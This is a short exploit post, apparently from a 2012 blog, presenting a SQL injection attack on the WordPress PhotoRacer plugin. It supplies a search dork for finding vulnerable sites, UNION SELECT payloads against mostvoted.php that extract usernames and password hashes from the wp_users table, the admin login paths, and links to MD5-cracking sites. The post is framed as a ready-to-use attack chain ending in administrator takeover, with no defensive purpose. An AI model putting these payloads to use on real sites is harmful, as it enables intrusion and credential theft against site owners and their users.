2 thg 9, 2012

WordPress PhotoRacer Plugin(Attachment) SQL Exploit

Hi aLL ! I am OrucReis 

Coder ; OrucReis
Country ; TURKEY

I am tell WordPress PhotoRacer Plugin(Attachment).
I have found this vulnerability :)
I hope that is helpful...

Dork ; inurl:"mostvoted.php?pid="

Exploit ; mostvoted.php?pid=-xx union select 1,2,3,4,concat_ws(user_login,user_pass),6,7 from wp_users

OR ;

Username= mostvoted.php?pid=-xx union select 1,2,3,4,user_login,6,7 from wp_users
Password= mostvoted.php?pid=-xx union select 1,2,3,4,user_pass,6,7 from wp_users

Admin Panel= /wp-login.php , /wp-login/ , /wp-admin.php or /wp-admin/

MD5 Crack;
http://hashchecker.de
http://md5cracker.org
__________________

Không có nhận xét nào:

Đăng nhận xét